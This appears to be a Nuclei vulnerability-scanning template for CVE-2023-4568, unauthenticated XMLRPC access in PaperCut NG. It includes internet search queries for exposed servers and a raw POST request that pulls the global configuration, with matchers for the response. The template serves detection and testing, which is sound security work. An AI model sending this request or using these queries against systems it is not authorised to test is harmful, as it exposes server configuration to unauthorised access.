id: CVE-2023-4568 info: name: PaperCut NG Unauthenticated XMLRPC Functionality author: DhiyaneshDK severity: medium description: | PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch. impact: | Successful exploitation of this vulnerability could lead to remote code execution or unauthorized access to sensitive information. reference: - https://nvd.nist.gov/vuln/detail/CVE-2023-4568 - https://www.tenable.com/security/research/tra-2023-31 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N cvss-score: 6.5 cve-id: CVE-2023-4568 cwe-id: CWE-287 epss-score: 0.02217 epss-percentile: 0.89475 cpe: cpe:2.3:a:papercut:papercut_ng:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: papercut product: papercut_ng shodan-query: - html:"content=\"PaperCut\"" - http.html:'content="papercut' - cpe:"cpe:2.3:a:papercut:papercut_ng" - http.html:"content=\"papercut\"" fofa-query: - body='content="papercut' - body="content=\"papercut\"" google-query: html:'content="papercut' tags: cve2023,cve,unauth,papercut http: - raw: - | POST /rpc/clients/xmlrpc HTTP/1.1 Host: {{Hostname}} Content-Type:text/xml client.getGlobalConfigstr1str2 matchers-condition: and matchers: - type: word part: body words: - 'conf.ssl-port' - 'conf.auth-ttl-default' condition: and - type: word part: header words: - text/xml - type: status status: - 200 # digest: 4a0a00473045022061af53e49ff89431b21f4c73cd1766d421c1956e6e5833ffe4d4d03ca6d4f1dd022100a256d63fc52f62aef89b997b4fcf912d447e2b0aeddd53e8f74a767d5485ff0b:922c64590222798bb761d5b6d8e72950